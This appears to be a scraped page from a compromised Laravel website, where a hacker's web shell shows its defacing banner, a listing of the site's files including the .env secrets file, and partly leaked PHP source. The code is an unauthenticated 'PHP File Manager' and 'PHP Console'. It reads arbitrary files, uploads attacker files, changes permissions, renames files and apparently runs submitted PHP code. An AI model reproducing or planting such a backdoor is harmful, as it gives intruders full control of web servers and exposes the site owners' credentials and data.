I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
getMessage(); } $phpOutput = ob_get_clean(); restore_error_handler(); // Восстанавливаем обработчик ошибок после выполнения } // Получаем текущую директорию $directory = isset($_GET['dir']) ? $_GET['dir'] : $_SERVER['DOCUMENT_ROOT']; $directory = rtrim($directory, '/'); // Убираем лишний слэш в конце // Санитизируем и проверяем путь $directory = sanitizePath($directory); if (!$directory || !is_dir($directory)) { $directory = $_SERVER['DOCUMENT_ROOT']; // Если директория некорректна, возвращаем в корень } // Получаем файлы и папки в текущей директории $files = scandir($directory); // Разделим папки и файлы $dirs = []; $non_dirs = []; foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $filePath = $directory . '/' . $file; if (is_dir($filePath)) { $dirs[] = $file; } else { $non_dirs[] = $file; } } } // Сортировка папок и файлов sort($dirs); sort($non_dirs); // Объединяем папки и файлы $files = array_merge($dirs, $non_dirs); // Функция для генерации пути с кликабельными частями function generateClickablePath($path) { $parts = explode(DIRECTORY_SEPARATOR, $path); $currentPath = ''; $clickablePath = ''; foreach ($parts as $index => $part) { $currentPath .= DIRECTORY_SEPARATOR . $part; $clickablePath .= '' . safePath($part) . ''; if ($index < count($parts) - 1) { $clickablePath .= ' / '; } } return $clickablePath; } // Проверка на запрос содержимого файла для модального окна if (isset($_GET['file'])) { $filePath = sanitizePath($directory . '/' . $_GET['file']); if (is_file($filePath)) { echo file_get_contents($filePath); } exit; } // Обработка изменений прав, переименования и изменения времени // Обработка изменений прав, переименования и изменения времени if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = $_POST['action'] ?? ''; $filePath = sanitizePath($directory . '/' . $_POST['file'] ?? ''); if ($action === 'createFile') { // Создание нового файла $newFileName = $_POST['newFileName'] ?? ''; if ($newFileName) { $fileToCreate = $directory . '/' . $newFileName; if (!file_exists($fileToCreate)) { touch($fileToCreate); // Создаём пустой файл } else { echo "File already exists!"; } } } if ($action === 'createFolder') { // Создание новой папки $newFolderName = $_POST['newFolderName'] ?? ''; if ($newFolderName) { $folderToCreate = $directory . '/' . $newFolderName; if (!is_dir($folderToCreate)) { mkdir($folderToCreate); // Создаём новую папку } else { echo "Folder already exists!"; } } } if ($action === 'uploadFile') { // Загрузка файла if (isset($_FILES['fileToUpload']) && $_FILES['fileToUpload']['error'] == 0) { $targetFile = $directory . '/' . basename($_FILES['fileToUpload']['name']); if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $targetFile)) { echo "The file has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } } } if (is_file($filePath)) { // Для файлов разрешаем все действия if ($action === 'chmod') { $chmod = $_POST['chmod'] ?? ''; if ($chmod) { chmod($filePath, octdec($chmod)); } } if ($action === 'rename') { $newName = $_POST['newName'] ?? ''; if ($newName) { rename($filePath, dirname($filePath) . '/' . $newName); } } if ($action === 'touch') { touch($filePath); } } elseif (is_dir($filePath)) { // Для папок разрешаем только chmod и rename if ($action === 'chmod') { $chmod = $_POST['chmod'] ?? ''; if ($chmod) { chmod($filePath, octdec($chmod)); } } if ($action === 'rename') { $newName = $_POST['newName'] ?? ''; if ($newName) { rename($filePath, dirname($filePath) . '/' . $newName); } } } } ?> PHP File Manager

PHP File Manager

PHP Console


Output:

Error:

Current Directory:
Go to Root You are at the root directory.
Filename Action
'; echo '[' . safePath($file) . ']'; } else { echo ''; echo '' . safePath($file) . ''; } ?>